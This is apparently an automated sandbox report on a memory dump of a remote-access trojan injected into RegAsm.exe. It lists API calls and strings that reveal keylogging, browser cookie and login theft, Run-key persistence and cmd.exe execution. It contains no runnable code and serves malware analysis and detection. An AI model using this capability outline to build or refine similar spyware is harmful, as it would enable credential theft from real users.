                                                        • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                        APIs
                                                        • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                          • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                          • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                        • String ID: XQG$NG$PG
                                                        • API String ID: 1634807452-3565412412
                                                        • Opcode ID: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                                        • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                        • Opcode Fuzzy Hash: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                                        • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                        • _free.LIBCMT ref: 004435E0
                                                        • _free.LIBCMT ref: 004435EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$FileModuleName
                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        • API String ID: 2506810119-1068371695
                                                        • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                        • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                        • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                        • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BBFE,?,00000000,FF8BC35D), ref: 0044B952
                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B980
                                                        • GetLastError.KERNEL32 ref: 0044B9B1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharErrorFileLastMultiWideWrite
                                                        • String ID: PkGNG
                                                        • API String ID: 2456169464-263838557
                                                        • Opcode ID: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                                        • Instruction ID: 31ac96f82a5847659344ef20b41dc67af7a50504b34fbd786f6314a6cc22fa3b
                                                        • Opcode Fuzzy Hash: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                                        • Instruction Fuzzy Hash: B13161B5A102199FDB14CF59DD819EAB7B9FB08305F0444BEE90AD7251D734ED80CBA4
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                          • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                          • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                          • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                          • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                        • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                        • String ID: /sort "Visit Time" /stext "$0NG
                                                        • API String ID: 368326130-3219657780
                                                        • Opcode ID: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                                        • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                        • Opcode Fuzzy Hash: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                                        • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                        APIs
                                                        • SystemParametersInfoW.USER32 ref: 0041CB68
                                                          • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                                          • Part of subcall function 004137AA: RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000), ref: 004137E1
                                                          • Part of subcall function 004137AA: RegCloseKey.ADVAPI32(0046612C), ref: 004137EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateInfoParametersSystemValue
                                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                        • API String ID: 4127273184-3576401099
                                                        • Opcode ID: f5c8ef2c27851cf1013244d94d6a0450d36d3a4faca39a9ae70033779c708183
                                                        • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                        • Opcode Fuzzy Hash: f5c8ef2c27851cf1013244d94d6a0450d36d3a4faca39a9ae70033779c708183
                                                        • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00416330
                                                          • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                          • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                          • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                          • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _wcslen$CloseCreateValue
                                                        • String ID: !D@$okmode$PG
                                                        • API String ID: 3411444782-3370592832
                                                        • Opcode ID: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                                        • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                        • Opcode Fuzzy Hash: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                                        • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                        APIs
                                                          • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                                                        Strings
                                                        • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                        • API String ID: 1174141254-1980882731
                                                        • Opcode ID: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                                        • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                        • Opcode Fuzzy Hash: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                                        • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                        APIs
                                                          • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                                                        Strings
                                                        • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                        • API String ID: 1174141254-1980882731
                                                        • Opcode ID: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                                        • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                        • Opcode Fuzzy Hash: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                                        • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                        APIs
                                                        • CreateThread.KERNEL32(00000000,00000000,0040A2B8,004750F0,00000000,00000000), ref: 0040A239
                                                        • CreateThread.KERNEL32(00000000,00000000,0040A2A2,004750F0,00000000,00000000), ref: 0040A249
                                                        • CreateThread.KERNEL32(00000000,00000000,0040A2C4,004750F0,00000000,00000000), ref: 0040A255
                                                          • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                          • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread$LocalTimewsprintf
                                                        • String ID: Offline Keylogger Started
                                                        • API String ID: 465354869-4114347211
                                                        • Opcode ID: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                                        • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                        • Opcode Fuzzy Hash: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                                        • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                        APIs
                                                          • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                          • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                        • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040AFA9
                                                        • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040AFB5
                                                        • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread$LocalTime$wsprintf
                                                        • String ID: Online Keylogger Started
                                                        • API String ID: 112202259-1258561607
                                                        • Opcode ID: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                                        • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                        • Opcode Fuzzy Hash: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                                        • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                        APIs
                                                        • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LocalTime
                                                        • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                                        • API String ID: 481472006-3277280411
                                                        • Opcode ID: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                                        • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                        • Opcode Fuzzy Hash: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                                        • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                        • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                                        Strings
                                                        • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Create$EventLocalThreadTime
                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                        • API String ID: 2532271599-1507639952
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: CryptUnprotectData$crypt32
                                                        • API String ID: 2574300362-2380590389
                                                        APIs
                                                        • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000), ref: 0044C30C
                                                        • GetLastError.KERNEL32 ref: 0044C316
                                                        • __dosmaperr.LIBCMT ref: 0044C31D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                        • String ID: PkGNG
                                                        • API String ID: 2336955059-263838557
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                        • CloseHandle.KERNEL32(?), ref: 004051CA
                                                        • SetEvent.KERNEL32(?), ref: 004051D9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEventHandleObjectSingleWait
                                                        • String ID: Connection Timeout
                                                        • API String ID: 2055531096-499159329
                                                        APIs
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Exception@8Throw
                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                        • API String ID: 2005118841-1866435925
                                                        APIs
                                                        • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB9A
                                                        • LocalFree.KERNEL32(?,?), ref: 0041CBC0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FormatFreeLocalMessage
                                                        • String ID: @J@$PkGNG
                                                        • API String ID: 1427518018-1416487119
                                                        APIs
                                                        • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041385A
                                                        • RegSetValueExW.ADVAPI32 ref: 00413888
                                                        • RegCloseKey.ADVAPI32(?), ref: 00413893
                                                        Strings
                                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413858
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateValue
                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                        • API String ID: 1818849710-1051519024
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                          • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                          • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                        • String ID: bad locale name
                                                        • API String ID: 3628047217-1405518554
                                                        APIs
                                                        • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                                        • RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000), ref: 004137E1
                                                        • RegCloseKey.ADVAPI32(0046612C), ref: 004137EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateValue
                                                        • String ID: Control Panel\Desktop
                                                        • API String ID: 1818849710-27424756
                                                        APIs
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                        • ShowWindow.USER32(00000009), ref: 00416C9C
                                                        • SetForegroundWindow.USER32 ref: 00416CA8
                                                          • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                                          • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                          • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                        • String ID: !D@
                                                        • API String ID: 3446828153-604454484
                                                        APIs
                                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExecuteShell
                                                        • String ID: /C $cmd.exe$open
                                                        • API String ID: 587946157-3896048727
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: GetCursorInfo$User32.dll
                                                        • API String ID: 1646373207-2714051624
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetLastInputInfo$User32.dll
                                                        • API String ID: 2574300362-1519888992
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        APIs
                                                        Strings
                                                        • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                        • Cleared browsers logins and cookies., xrefs: 0040C130
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                        • API String ID: 3472027048-1236744412
                                                        APIs
                                                          • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                                                          • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32 ref: 0041C5FB
                                                          • Part of subcall function 0041C5E2: GetWindowTextW.USER32 ref: 0041C625
                                                        • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                        • Sleep.KERNEL32(00000064), ref: 0040A638
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$SleepText$ForegroundLength
                                                        • String ID: [ $ ]
                                                        • API String ID: 3309952895-93608704
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                        • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C543
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041C568
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                        • API ID: File$CloseCreateHandleReadSize
                                                        • String ID:
                                                        • API String ID: 3919263394-0
                                                        APIs
                                                        • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                                                        • API ID: CloseHandleOpenProcess
                                                        • String ID:
                                                        • API String ID: 39102293-0
                                                        APIs
                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                          • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                        • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                        • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                        • String ID:
                                                        • API String ID: 2633735394-0
                                                        APIs
                                                        • API ID: MetricsSystem
                                                        • String ID:
                                                        • API String ID: 4116985748-0
                                                        APIs
                                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                          • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                        • String ID:
                                                        • API String ID: 1761009282-0
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                        • API ID: ErrorHandling__start
                                                        • String ID: pow
                                                        • API String ID: 3213639722-2276729525
                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F8F
                                                        • GetLastError.KERNEL32 ref: 00449FAB
                                                        • API ID: ByteCharErrorLastMultiWide
                                                        • String ID: PkGNG
